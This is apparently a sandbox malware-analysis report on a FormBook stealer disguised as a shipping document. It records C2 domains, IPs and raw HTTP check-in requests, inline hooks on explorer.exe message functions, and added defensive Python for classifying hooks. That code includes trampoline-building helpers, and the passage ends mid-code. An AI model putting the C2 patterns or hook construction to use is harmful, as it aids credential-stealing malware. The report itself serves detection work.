                                          SHA-512:B58245FFFDB739549075B2D5CEA031CF4285D063DE2C4726BB0A7F628C30F4784D63A0251482F413B9F39A495CD4C60ECABD6CD55E0FA4AD4D4D9CD10D276821
                                          Malicious:false
                                          Reputation:low
                                          C:\Users\user\AppData\Local\Temp\nseA921.tmp
                                          Process:C:\Users\user\Desktop\SHIPPING DOCUMENT.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):201373
                                          Entropy (8bit):7.948650642039385
                                          Encrypted:false
                                          SSDEEP:3072:EjG7DdGNe8lzSGePvjqjjGdz2YruLwmPrghVxoMb6im3Ygvadup3:Ea7DdGNblz7SLqXGdB8HUl613Y1du1
                                          MD5:22CC1D52F7688CE084D84D06B5B18523
                                          SHA1:C41A04F9646DFC78B1588E47DEFF50A7FF3B43A2
                                          SHA-256:261A44AAD8BE10E8CA564F30810D9984A5CCFE4231E47987B9276777079C8BF1
                                          SHA-512:A7C9FF520347982CA333AEF083ADB8839C5899A0A7A6755313AD8009C25F84573F990E32B10E4B5F0A6F03B0387ECCA8570D56223E31F84FB69A79A198DE2F19
                                          Malicious:false
                                          Reputation:low
                                          C:\Users\user\AppData\Local\Temp\nszA951.tmp\2x6gdfzk.dll
                                          Process:C:\Users\user\Desktop\SHIPPING DOCUMENT.exe
                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):5632
                                          Entropy (8bit):4.090507095598033
                                          Encrypted:false
                                          SSDEEP:48:qixZ/QGn1ASkT3jNDZbitP8Xst6F22ltnl0qe/hqHht0j9Pl4jdajpqKncLjNS3I:Bhn1ASknNDZ+tltm2InlLRul4jdkpN3
                                          MD5:45ADFA33A0E6A780E55F543A36143542
                                          SHA1:540BBBF9EC26DDEF911BA80EE0365CF23B687749
                                          SHA-256:5299A5C9BA1296DB0A9F804741B58EC7A0FEDAEF8937E3CDC21D3523E0449EE3
                                          SHA-512:2AD608026D78DEDD9F803B6A2F7E27E5590D9DF5870ADECCBDFC353B1D546450075743B499EBCF57F8D67886188DB92BA8F968B4D71FED624FD948D3B047A0E3
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 17%
                                          Reputation:low

                                          Static File Info

                                          General

                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                          Entropy (8bit):7.896133124119752
                                          TrID:
                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                          • DOS Executable Generic (2002/1) 0.02%
                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                          File name:SHIPPING DOCUMENT.exe
                                          File size:233957
                                          MD5:25e847b9631bc2fe8d87fe4278fa142e
                                          SHA1:641756a84fdce68e101a53cfa6809b68190b7ad7
                                          SHA256:70dfd7bc81878d265e39803f73f55af96d7bf2a336408b52cc6005785fbe0415
                                          SHA512:82c1e56fa6a6611c45057c80190d2d7d220294a690044a164cdda39bc5e26b8c35d76433e3b1d7d247ef464d3307911a4a4337e52163177f4322fbe67579dabd
                                          SSDEEP:6144:lPXZ+Qpc3dgPKMqFsSa94wwuYc3ZqiU5OPiNCPEXH:T+Qpc3dg4GS+4w5YcxiXH

                                          File Icon

                                          Icon Hash:b2a88c96b2ca6a72

                                          Static PE Info

                                          General

                                          Entrypoint:0x403461
                                          Entrypoint Section:.text
                                          Digitally signed:false
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                          DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                          Time Stamp:0x5F24D6E4 [Sat Aug 1 02:43:48 2020 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:
                                          OS Version Major:4
                                          OS Version Minor:0
                                          File Version Major:4
                                          File Version Minor:0
                                          Subsystem Version Major:4
                                          Subsystem Version Minor:0
                                          Import Hash:ea4e67a31ace1a72683a99b80cf37830

                                          Entrypoint Preview

                                          Instruction
                                          sub esp, 00000184h
                                          push ebx
                                          push esi
                                          push edi
                                          xor ebx, ebx
                                          push 00008001h
                                          mov dword ptr [esp+18h], ebx
                                          mov dword ptr [esp+10h], 0040A130h
                                          mov dword ptr [esp+20h], ebx
                                          mov byte ptr [esp+14h], 00000020h
                                          call dword ptr [004080B0h]
                                          call dword ptr [004080C0h]
                                          and eax, BFFFFFFFh
                                          cmp ax, 00000006h
                                          mov dword ptr [0042474Ch], eax
                                          je 00007F38E0BFA453h
                                          push ebx
                                          call 00007F38E0BFD5CEh
                                          cmp eax, ebx
                                          je 00007F38E0BFA449h
                                          push 00000C00h
                                          call eax
                                          mov esi, 004082A0h
                                          push esi
                                          call 00007F38E0BFD54Ah
                                          push esi
                                          call dword ptr [004080B8h]
                                          lea esi, dword ptr [esi+eax+01h]
                                          cmp byte ptr [esi], bl
                                          jne 00007F38E0BFA42Dh
                                          push 0000000Bh
                                          call 00007F38E0BFD5A2h
                                          push 00000009h
                                          call 00007F38E0BFD59Bh
                                          push 00000007h
                                          mov dword ptr [00424744h], eax
                                          call 00007F38E0BFD58Fh
                                          cmp eax, ebx
                                          je 00007F38E0BFA451h
                                          push 0000001Eh
                                          call eax
                                          test eax, eax
                                          je 00007F38E0BFA449h
                                          or byte ptr [0042474Fh], 00000040h
                                          push ebp
                                          call dword ptr [00408038h]
                                          push ebx
                                          call dword ptr [00408288h]
                                          mov dword ptr [00424818h], eax
                                          push ebx
                                          lea eax, dword ptr [esp+38h]
                                          push 00000160h
                                          push eax
                                          push ebx
                                          push 0041FD10h
                                          call dword ptr [0040816Ch]
                                          push 0040A1ECh

                                          Rich Headers

                                          Programming Language:
                                          • [EXP] VC++ 6.0 SP5 build 8804

                                          Data Directories

Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x8438           0xa0          .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x2d000          0xa50         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x0              0x0
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x8000           0x29c         .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

                                          Sections

Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy        Characteristics
.text   0x1000           0x623c        0x6400    False     0.65859375       data       6.40257705324  IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata  0x8000           0x1274        0x1400    False     0.43359375       data       5.05749598324  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data   0xa000           0x1a858       0x600     False     0.445963541667   data       4.08975001509  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.ndata  0x25000          0x8000        0x0       False     0                empty      0.0            IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc   0x2d000          0xa50         0xc00     False     0.402994791667   data       4.1909607241   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                          Resources

Name           RVA      Size   Type                                                                          Language  Country
RT_ICON        0x2d190  0x2e8  data                                                                          English   United States
RT_DIALOG      0x2d478  0x100  data                                                                          English   United States
RT_DIALOG      0x2d578  0x11c  data                                                                          English   United States
RT_DIALOG      0x2d698  0x60   data                                                                          English   United States
RT_GROUP_ICON  0x2d6f8  0x14   data                                                                          English   United States
RT_MANIFEST    0x2d710  0x340  XML 1.0 document, ASCII text, with very long lines, with no line terminators  English   United States

                                          Imports

                                          DLL | Import
                                          ADVAPI32.dll | RegCreateKeyExA, RegEnumKeyA, RegQueryValueExA, RegSetValueExA, RegCloseKey, RegDeleteValueA, RegDeleteKeyA, AdjustTokenPrivileges, LookupPrivilegeValueA, OpenProcessToken, SetFileSecurityA, RegOpenKeyExA, RegEnumValueA
                                          SHELL32.dll | SHGetFileInfoA, SHFileOperationA, SHGetPathFromIDListA, ShellExecuteExA, SHGetSpecialFolderLocation, SHBrowseForFolderA
                                          ole32.dll | IIDFromString, OleInitialize, OleUninitialize, CoCreateInstance, CoTaskMemFree
                                          COMCTL32.dll | ImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                          USER32.dll | SetClipboardData, CharPrevA, CallWindowProcA, PeekMessageA, DispatchMessageA, MessageBoxIndirectA, GetDlgItemTextA, SetDlgItemTextA, GetSystemMetrics, CreatePopupMenu, AppendMenuA, TrackPopupMenu, FillRect, EmptyClipboard, LoadCursorA, GetMessagePos, CheckDlgButton, GetSysColor, SetCursor, GetWindowLongA, SetClassLongA, SetWindowPos, IsWindowEnabled, GetWindowRect, GetSystemMenu, EnableMenuItem, RegisterClassA, ScreenToClient, EndDialog, GetClassInfoA, SystemParametersInfoA, CreateWindowExA, ExitWindowsEx, DialogBoxParamA, CharNextA, SetTimer, DestroyWindow, CreateDialogParamA, SetForegroundWindow, SetWindowTextA, PostQuitMessage, SendMessageTimeoutA, ShowWindow, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, GetDC, SetWindowLongA, LoadImageA, InvalidateRect, ReleaseDC, EnableWindow, BeginPaint, SendMessageA, DefWindowProcA, DrawTextA, GetClientRect, EndPaint, IsWindowVisible, CloseClipboard, OpenClipboard
                                          GDI32.dll | SetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectA, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                                          KERNEL32.dll | GetExitCodeProcess, WaitForSingleObject, GetProcAddress, GetSystemDirectoryA, WideCharToMultiByte, MoveFileExA, GetTempFileNameA, RemoveDirectoryA, WriteFile, CreateDirectoryA, GetLastError, CreateProcessA, GlobalLock, GlobalUnlock, CreateThread, lstrcpynA, SetErrorMode, GetDiskFreeSpaceA, lstrlenA, GetCommandLineA, GetVersion, GetWindowsDirectoryA, SetEnvironmentVariableA, GetTempPathA, CopyFileA, GetCurrentProcess, ExitProcess, GetModuleFileNameA, GetFileSize, ReadFile, GetTickCount, Sleep, CreateFileA, GetFileAttributesA, SetCurrentDirectoryA, SetFileAttributesA, GetFullPathNameA, GetShortPathNameA, MoveFileA, CompareFileTime, SetFileTime, SearchPathA, lstrcmpiA, lstrcmpA, CloseHandle, GlobalFree, GlobalAlloc, ExpandEnvironmentStringsA, LoadLibraryExA, FreeLibrary, lstrcpyA, lstrcatA, FindClose, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, SetFilePointer, GetModuleHandleA, FindNextFileA, FindFirstFileA, DeleteFileA, MulDiv

                                          Possible Origin

                                          Language of compilation system | Country where language is spoken | Map
                                          English | United States | (map image not captured)

                                          Network Behavior

                                          Snort IDS Alerts

                                          Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                          05/04/21-20:11:56.504622 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49762 | 34.102.136.180 | 192.168.2.4
                                          05/04/21-20:12:37.590909 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49766 | 80 | 192.168.2.4 | 154.220.41.208
                                          05/04/21-20:12:37.590909 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49766 | 80 | 192.168.2.4 | 154.220.41.208
                                          05/04/21-20:12:37.590909 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49766 | 80 | 192.168.2.4 | 154.220.41.208

                                          Network Port Distribution

                                          TCP Packets


                                          UDP Packets


                                          DNS Queries

                                          Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                          May 4, 2021 20:11:36.049501896 CEST | 192.168.2.4 | 8.8.8.8 | 0x7501 | Standard query (0) | www.barkinlot.com | A (IP address) | IN (0x0001)
                                          May 4, 2021 20:11:56.263324976 CEST | 192.168.2.4 | 8.8.8.8 | 0xd8c7 | Standard query (0) | www.buyruon.com | A (IP address) | IN (0x0001)
                                          May 4, 2021 20:12:16.698889017 CEST | 192.168.2.4 | 8.8.8.8 | 0xfab8 | Standard query (0) | www.fuerzaagavera.com | A (IP address) | IN (0x0001)
                                          May 4, 2021 20:12:37.072877884 CEST | 192.168.2.4 | 8.8.8.8 | 0xce44 | Standard query (0) | www.union-green.com | A (IP address) | IN (0x0001)

                                          DNS Answers

                                          Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                          May 4, 2021 20:11:36.424552917 CEST | 8.8.8.8 | 192.168.2.4 | 0x7501 | No error (0) | www.barkinlot.com | - | 107.151.79.234 | A (IP address) | IN (0x0001)
                                          May 4, 2021 20:11:56.324739933 CEST | 8.8.8.8 | 192.168.2.4 | 0xd8c7 | No error (0) | www.buyruon.com | buyruon.com | - | CNAME (Canonical name) | IN (0x0001)
                                          May 4, 2021 20:11:56.324739933 CEST | 8.8.8.8 | 192.168.2.4 | 0xd8c7 | No error (0) | buyruon.com | - | 34.102.136.180 | A (IP address) | IN (0x0001)
                                          May 4, 2021 20:12:16.768903971 CEST | 8.8.8.8 | 192.168.2.4 | 0xfab8 | No error (0) | www.fuerzaagavera.com | - | 64.190.62.111 | A (IP address) | IN (0x0001)
                                          May 4, 2021 20:12:37.284445047 CEST | 8.8.8.8 | 192.168.2.4 | 0xce44 | No error (0) | www.union-green.com | - | 154.220.41.208 | A (IP address) | IN (0x0001)

                                          HTTP Request Dependency Graph

                                          • www.barkinlot.com
                                          • www.buyruon.com
                                          • www.fuerzaagavera.com
                                          • www.union-green.com

                                          HTTP Packets

                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          0 | 192.168.2.4 | 49754 | 107.151.79.234 | 80 | C:\Windows\explorer.exe

                                          Timestamp: May 4, 2021 20:11:36.722306013 CEST | kBytes transferred: 2080 | Direction: OUT
                                          Data:
                                          GET /dxe/?k0GxOl=WjDhBMZGXEFchLZ7o6W3JT2VhJsjwIpQ+RcXbs0zm7DaFFVtu5gSyYsWe3hhttt0VKfM&NX1TzP=t8UH-PXh7J HTTP/1.1
                                          Host: www.barkinlot.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                          Timestamp: May 4, 2021 20:11:37.016350031 CEST | kBytes transferred: 2123 | Direction: IN
                                          Data:
                                          HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Tue, 04 May 2021 18:11:41 GMT
                                          Content-Type: text/html
                                          Content-Length: 4372
                                          Connection: close
                                          Vary: Accept-Encoding
                                          Data Ascii: <!DOCTYPE html><html><head><meta charset="GBK"><title>||||||||</title>...[if IE 8]><style>.ie8 .alert-circle,.ie8 .alert-footer{display:none}.ie8 .alert-box{padding-top:75px}.ie8 .alert-sec-text{top:45px}</style><![endif]--><style>body{margin:0;padding:0;background:#E6EAEB;font-family:Arial,'','',sans-serif}.alert-box{display:none;position:relative;margin:96px auto 0;padding:180px 85px 22px;border-radius:10px 10px 0 0;background:#FFF;box-shadow:5px 9px 17px rgba(102,102,102,0.75);width:286px;color:#FFF;text-align:center}.alert-box p{margin:0}.alert-circle{position:absolute;top:-50px;left:111px}.alert-sec-circle{stroke-dashoffset:0;stroke-dasharray:735;transition:stroke-dashoffset 1s linear}.alert-sec-text{position:absolute;top:11px;left:190px;width:76px;color:#000;font-size:68px}.alert-sec-unit{font-size:34px}.alert-body{margin:35px 0}.alert-head{color:#242424;font-size:28px}.alert-concent{margin:25px 0 14px;color:#7B7B7B;font-size:18px}.alert-concent p{line-height:27px}.alert-btn{display:block;border-radius:10px;background-color:#4AB0F7;height:55px;line-height:55px;width:286px;color:#FFF;font-size:20px;text-decorat


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          1 | 192.168.2.4 | 49762 | 34.102.136.180 | 80 | C:\Windows\explorer.exe

                                          Timestamp: May 4, 2021 20:11:56.367537022 CEST | kBytes transferred: 6379 | Direction: OUT
                                          Data:
                                          GET /dxe/?k0GxOl=sFVJxLIQKAVd+Y7XtG7gnaG34PPCpjG6GFyGl+6CuFNb0W3+mUMXX+9XGZNJldEnuWZ9&NX1TzP=t8UH-PXh7J HTTP/1.1
                                          Host: www.buyruon.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                          Timestamp: May 4, 2021 20:11:56.504621983 CEST | kBytes transferred: 6380 | Direction: IN
                                          Data:
                                          HTTP/1.1 403 Forbidden
                                          Server: openresty
                                          Date: Tue, 04 May 2021 18:11:56 GMT
                                          Content-Type: text/html
                                          Content-Length: 275
                                          ETag: "6089be8c-113"
                                          Via: 1.1 google
                                          Connection: close
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          2 | 192.168.2.4 | 49765 | 64.190.62.111 | 80 | C:\Windows\explorer.exe

                                          Timestamp: May 4, 2021 20:12:16.816143990 CEST | kBytes transferred: 6409 | Direction: OUT
                                          Data:
                                          GET /dxe/?k0GxOl=RbAtrmEWvlHFDlwUmkIgxTv6ob9YXkoV/NFTjoChCyM+ucvF9ABfViB5xXwNeUqJEtMU&NX1TzP=t8UH-PXh7J HTTP/1.1
                                          Host: www.fuerzaagavera.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                          Timestamp: May 4, 2021 20:12:16.892096996 CEST | kBytes transferred: 6410 | Direction: IN
                                          Data:
                                          HTTP/1.1 302 Found
                                          date: Tue, 04 May 2021 18:12:16 GMT
                                          content-type: text/html; charset=UTF-8
                                          content-length: 0
                                          x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_EROzPbOnbfRvUmSbAOkEUwJ7s553pIun9G63+qZ5vnIypGjvdj+l8kui4EOI3lWVG2yScLUXKcmIyMA5hPxUDw==
                                          expires: Mon, 26 Jul 1997 05:00:00 GMT
                                          cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                          pragma: no-cache
                                          last-modified: Tue, 04 May 2021 18:12:16 GMT
                                          location: https://sedo.com/search/details/?partnerid=324561&language=it&domain=fuerzaagavera.com&origin=sales_lander_1&utm_medium=Parking&utm_campaign=offerpage
                                          x-cache-miss-from: parking-5cc4cbb56f-gtxcr
                                          server: NginX
                                          connection: close


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          3 | 192.168.2.4 | 49766 | 154.220.41.208 | 80 | C:\Windows\explorer.exe

                                          Timestamp: May 4, 2021 20:12:37.590909004 CEST | kBytes transferred: 6412 | Direction: OUT
                                          Data:
                                          GET /dxe/?k0GxOl=sOnMPkACxZJCHwFpI01WJHJoP6Rqh5hpLBOGFt1I8eGpOjOkLkuqJ1zaMIEMMNEsyDxC&NX1TzP=t8UH-PXh7J HTTP/1.1
                                          Host: www.union-green.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                          Timestamp: May 4, 2021 20:12:37.898349047 CEST | kBytes transferred: 6412 | Direction: IN
                                          Data:
                                          HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Tue, 04 May 2021 18:12:37 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Vary: Accept-Encoding
                                          Data Raw: 31 0d 0a 2e 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 1.0


                                          Code Manipulations

                                          User Modules

                                          Hook Summary

Function Name    Hook Type    Active in Processes
PeekMessageA     INLINE       explorer.exe
PeekMessageW     INLINE       explorer.exe
GetMessageW      INLINE       explorer.exe
GetMessageA      INLINE       explorer.exe

                                          Processes

                                          Process: explorer.exe, Module: user32.dll
Function Name    Hook Type    New Data
PeekMessageA     INLINE       0x48 0x8B 0xB8 0x85 0x5E 0xE6
PeekMessageW     INLINE       0x48 0x8B 0xB8 0x8D 0xDE 0xE6
GetMessageW      INLINE       0x48 0x8B 0xB8 0x8D 0xDE 0xE6
GetMessageA      INLINE       0x48 0x8B 0xB8 0x85 0x5E 0xE6
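The four inline hooks sit on the user32.dll message-retrieval entry points inside explorer.exe, consistent with the "modifies the prolog of user mode functions" signature and with FormBook's documented hooking of these APIs to capture keystrokes in the process it injected into. The report shows only the first six patched bytes, and they are not one of the textbook trampolines, so a detector cannot rely on spotting an `E9` jump. The block below is an added example, not part of the report: given the live prologue and a clean copy (in a real check, read with ReadProcessMemory and from the DLL on disk respectively), it reports whether the function is patched, names the trampoline where it is a known pattern, and resolves the jump target. The `CLEAN` bytes are a hypothetical x64 prologue, not user32's real code; the `REPORTED` bytes are the New Data the sandbox lists for PeekMessageA/GetMessageA.

```python
"""Added example: classify an inline hook from the bytes at a function entry.
Readers that fetch the live and on-disk prologues are left to the caller;
here both are supplied as bytes."""
import struct

MASK64 = (1 << 64) - 1


def classify_hook(live, clean, func_addr):
    """Compare the live prologue with a clean copy and name the patch, if any.

    live/clean: first bytes of the function as seen in memory / on disk.
    func_addr: virtual address of the function, used to resolve relative jumps.
    """
    diff = [i for i, (a, b) in enumerate(zip(live, clean)) if a != b]
    if not diff:
        return {"hooked": False, "kind": None, "target": None, "first_diff": None}
    res = {"hooked": True, "kind": "unrecognised patch", "target": None,
           "first_diff": diff[0]}
    if live[0] == 0xE9 and len(live) >= 5:                      # jmp rel32
        rel = struct.unpack_from("<i", live, 1)[0]
        res["kind"] = "jmp rel32"
        res["target"] = (func_addr + 5 + rel) & MASK64
    elif live[:2] == b"\xff\x25" and len(live) >= 6:            # jmp [rip+disp32], x64
        disp = struct.unpack_from("<i", live, 2)[0]
        res["kind"] = "jmp [rip+disp32]"
        res["target"] = (func_addr + 6 + disp) & MASK64         # address of the pointer slot
    elif live[:2] == b"\x48\xb8" and len(live) >= 12 and live[10:12] == b"\xff\xe0":
        res["kind"] = "mov rax, imm64; jmp rax"                 # 12-byte absolute jump
        res["target"] = struct.unpack_from("<Q", live, 2)[0]
    elif live[0] == 0x68 and len(live) >= 6 and live[5] == 0xC3:
        res["kind"] = "push imm32; ret"                         # x86 absolute jump
        res["target"] = struct.unpack_from("<I", live, 1)[0]
    return res


def scan_exports(func_table, live_reader, clean_reader, n=16):
    """func_table: {name: address}; readers return n bytes at an address.
    Returns only the entries whose live bytes differ from the clean copy."""
    hooked = {}
    for name, addr in func_table.items():
        r = classify_hook(live_reader(addr, n), clean_reader(addr, n), addr)
        if r["hooked"]:
            hooked[name] = r
    return hooked


def make_jmp_rel32(func_addr, target, clean):
    """The 5-byte near jump a hook engine writes at func_addr (constructed)."""
    return b"\xe9" + struct.pack("<i", target - (func_addr + 5)) + clean[5:]


def make_abs_jmp64(target):
    """The 12-byte absolute jump used when the hook lies beyond +/-2 GiB."""
    return b"\x48\xb8" + struct.pack("<Q", target) + b"\xff\xe0"


# Constructed demo data: CLEAN is hypothetical, REPORTED is from the table above.
CLEAN = bytes.fromhex("48 83 ec 38 48 8b 0d")
REPORTED = bytes.fromhex("48 8b b8 85 5e e6")

if __name__ == "__main__":
    addr, target = 0x7FFB12345678, 0x7FFB00001000          # hypothetical addresses
    print(classify_hook(make_jmp_rel32(addr, target, CLEAN), CLEAN, addr))
    print(classify_hook(REPORTED, CLEAN, addr))              # patched, pattern unknown
```

The comparison against a clean copy is what catches the hook on this page: the first byte (`0x48`) is unchanged, so a detector keyed only on the first opcode would miss it, while the byte-for-byte diff flags it from offset 1 onward. When the live bytes match a known trampoline the resolved target tells you which module (or which private, unbacked region) the hook lands in, which is the next pivot in triage.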

                                          Statistics

                                          Behavior


                                          System Behavior

                                          General

                                          Start time:20:10:33
                                          Start date:04/05/2021
                                          Path:C:\Users\user\Desktop\SHIPPING DOCUMENT.exe
                                          Wow64 process (32bit):true
                                          Commandline:'C:\Users\user\Desktop\SHIPPING DOCUMENT.exe'
                                          Imagebase:0x400000
                                          File size:233957 bytes
                                          MD5 hash:25E847B9631BC2FE8D87FE4278FA142E
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.661322620.00000000023D0000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.661322620.00000000023D0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.661322620.00000000023D0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:low

                                          General

                                          Start time:20:10:34
                                          Start date:04/05/2021
                                          Path:C:\Users\user\Desktop\SHIPPING DOCUMENT.exe
                                          Wow64 process (32bit):true
                                          Commandline:'C:\Users\user\Desktop\SHIPPING DOCUMENT.exe'
                                          Imagebase:0x400000
                                          File size:233957 bytes
                                          MD5 hash:25E847B9631BC2FE8D87FE4278FA142E
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.700344342.0000000000710000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.700344342.0000000000710000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.700344342.0000000000710000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.700119931.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.700119931.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.700119931.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000001.656834932.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000001.656834932.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000001.656834932.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.700254188.00000000005A0000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.700254188.00000000005A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.700254188.00000000005A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:low
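The Yara matches for the second SHIPPING DOCUMENT.exe instance are reported against memory-dump names that carry the region's base address and page protection. Decoding them is worth doing: an executable-and-writable region at 0x400000, the sample's own image base, is what you would expect after the original image has been replaced in a hollowed process, and it matches the "changes PE section rights" and "process hollowing" signatures at the top of the report. The block below is an added example, not part of the report. The field layout (process index, stage, dump id, base address, protection, region type) is my reading of the names on this page, and the last two fields are decoded as the Windows PAGE_* and MEM_* constants; values the tables do not cover are reported as unknown rather than guessed.

```python
"""Added example: decode the .sdmp names attached to the Yara matches above.
Field layout is an assumption drawn from the names on this page; protection
and region type are decoded as Windows PAGE_* / MEM_* constants."""
import re

PAGE_BASE = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
             0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
             0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
PAGE_MOD = {0x100: "PAGE_GUARD", 0x200: "PAGE_NOCACHE", 0x400: "PAGE_WRITECOMBINE"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}
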